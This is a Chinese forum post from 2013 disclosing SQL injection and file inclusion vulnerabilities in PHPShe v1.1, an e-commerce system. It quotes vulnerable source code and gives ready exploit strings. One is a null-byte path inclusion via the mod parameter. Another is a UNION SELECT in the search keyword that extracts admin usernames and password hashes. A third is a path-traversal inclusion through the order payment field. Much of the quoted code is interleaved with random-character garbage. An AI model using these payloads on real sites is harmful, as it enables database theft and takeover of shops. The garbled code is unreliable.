phpshe v1.1多处SQL注入和文件包含漏洞Getshell

admin · 发表于 2013-4-19 19:01:54

/*******************************************************/
/* Phpshe v1.1 Vulnerability
/* ========================
/* By: : Kn1f3
/* E-Mail : 681796@qq.com
/*******************************************************/
0×00 整体大概参数传输

//common.php
if (get_magic_quotes_gpc()) {
!empty($_GET) && extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');
!empty($_POST) && extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');
}
else {
!empty($_GET) && extract(pe_trim($_GET),EXTR_PREFIX_ALL,'_g');
!empty($_POST) && extract(pe_trim($_POST),EXTR_PREFIX_ALL,'_p');
}
session_start();
!empty($_SESSION) && extract(pe_trim($_SESSION),EXTR_PREFIX_ALL,'_s');
!empty($_COOKIE) && extract(pe_trim(pe_stripslashes($_COOKIE)),EXTR_PREFIX_ALL,'_c');

0×01 包含漏洞

//首页文件
pe_num('cart', array('user_id'=>$_s_user_id)) : (unserialize($_c_cart_list) ? count(unserialize($_c_cart_list)) : 0);
include("{$pe['path_root']}module/{$module}/{$mod}.php"); //$mod可控造成“鸡肋”包含漏洞
pe_result();
?>
//common 文件第15行开始
url路由配置
$module = $mod = $act = 'index';
$mod = $_POST['mod'] ? $_POST['mod'] : ($_GET['mod'] ? $_GET['mod'] : $mod);
$act = $_POST['act'] ? $_POST['act'] : ($_GET['act'] ? $_GET['act'] : $act);
$id = $_POST['id'] ? $_POST['id'] : ($_GET['id'] ? $_GET['id'] : $id);
//exp：http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%00

* p; A6 `4 l! A& A+ B' w 4 R' I* I+ W$ c/ C
0×02 搜索注入9 F2 y' G& N" _
: ]) v0 {" |, y: V2 t: z
<code id="code2">

//product.php文件$ D# g5 U5 @( @+ H% B7 {8 @
case 'list':
$ _7 f. T* l) b0 J$ a$category_id = intval($id);% c0 i( D: N, \/ X
$info = $db->pe_select('category', array('category_id'=>$category_id));7 v( i! I! i( [: d& U$ ~3 G; M
//搜索
( E: r1 L% T1 i) N+ p7 n$sqlwhere = " and `product_state` = 1";
$ ]. C# B  [' z5 x% zpe_lead('hook/category.hook.php');
/ d0 S6 D) Y1 s" dif ($category_id) {* T' {- H1 r! E1 x8 a4 q4 X
where .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";
& ^4 m7 b0 Z7 X& e9 Z* J}
$ n# N+ @9 \3 U- G) s% I$_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'"; //keyword变量未进行有效的sql语句过滤6 I! \/ C' {5 C% A* N8 u  ?! w
if ($_g_orderby) {* x: E3 w# O$ e
$orderby = explode('_', $_g_orderby);" T; c; _& M) R, d- c1 v' E* u8 x
$sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";8 F/ `- }) F1 M/ y; D! U
}
9 S8 e! _9 ~& T/ u& x' Oelse {
% F. x; e  H7 a9 h/ M$sqlwhere .= " order by `product_id` desc";, @4 I' S6 o6 p& c
}
! w. A$ l2 x- ]  w& `7 E5 }$info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));5 Y2 t" L' L! \9 q
//热卖排行
* Q% H% N7 w% l# `, b9 Y1 @0 \$product_hotlist = product_hotlist();+ A2 p/ F5 s6 ~
//当前路径- ]. n: X: ^2 c9 x
$nowpath = category_path($category_id);
6 f+ g' h5 E4 D) I$seo = pe_seo($info['category_name']);
. A/ S7 y# |* X* u$ P6 ^6 Yinclude(pe_tpl('product_list.html'));$ o) F1 u0 i5 Z  U/ l
//跟进selectall函数库
" x2 J2 H  @0 N* b- zpublic function pe_selectall($table, $where = '', $field = '*', $limit_page = array())
1 O5 i4 V# D  W+ b7 T8 `* x, P{% A* v  {3 ~7 M; C) l8 d* P
//处理条件语句3 o" D- n9 U4 n/ j3 T
$sqlwhere = $this->_dowhere($where);; c2 f6 H, z; S5 c, l+ o
return $this->sql_selectall("select {$field} from `".dbpre."{$table}` {$sqlwhere}", $limit_page);/ c4 C4 c- S2 `1 o: i
}
" J" x! R. Q0 g//exp- r0 S: |9 ?  ?8 a% ^
product/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='1
! {2 V1 T3 g8 u

</code>0 g2 w7 F$ Q9 a/ `- s
1 d" i& ^" i( K
0×03 包含漏洞2+ k1 {5 Z( G6 D2 ?
& U9 Z6 j/ Q8 J: N
<code id="code3">

//order.php

case 'pay':

( f! @3 I- R: T7 f
$order_id = pe_dbhold($_g_id);

* O9 c& a0 N( X2 k+ {$cache_payway = cache::get('payway');

* i3 z# h7 o% o4 Z6 f5 h# K* B: }
foreach($cache_payway as $k => $v) {

% h$ W) \0 Q# P J2 q/ r# E
$cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);

: C. }- J! g& ~( D7 p* r& z
if ($k == 'bank') {

6 @% j& r: N9 `/ O- R
$cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);

# ~4 b" j6 J; Y4 T+ `- j# f( r}

4 r, |: ?: M; j; H1 d' M
}

6 i0 l! F* \5 i, z9 s6 {
$order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));

' }2 ^+ T, h2 y! T: N
!$order['order_id'] && pe_error('订单号错误...');

7 B3 u4 W$ Z8 L5 Qif (isset($_p_pesubmit)) {

0 [6 f4 ]- G. S. B: r8 ?& Rif ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {

% o0 U- q. k# C6 h$info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));

# c5 r% n2 T) uforeach ($info_list as $v) {

9 e5 s: ]( ?. y) a$order['order_name'] .= "{$v['product_name']};";
. h! g3 W7 W. h% o6 j) e9 i

8 s; ^* t) b& P+ j
}

$ B; j0 O. `" |4 O0 Y% }5 ]( L: zecho '正在为您连接支付网站，请稍后...';

3 G" @: R+ o/ q( T' g3 p* s
include("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");

# P$ @7 \9 k6 B' \* [2 L* e0 z2 B
}//当一切准备好的时候就可以进行"鸡肋包含了"

0 _- O4 H. \/ g5 B; p1 N
else {

/ g' S5 G' Q# T9 f. B# y5 Vpe_error('支付错误...');

9 @* x$ y$ U4 T2 T' x: N}

$ K- }" R2 P5 N
}

5 H( A' D) P4 _
$seo = pe_seo('选择支付方式');

3 H7 P2 x* q5 _! H0 l1 C
include(pe_tpl('order_pay.html'));

& U! l0 i" n7 d- J- `" _/ {break;

}

//exp：

//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001

//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>$ x n4 ~4 `% i

		自动登录	找回密码
密码			立即注册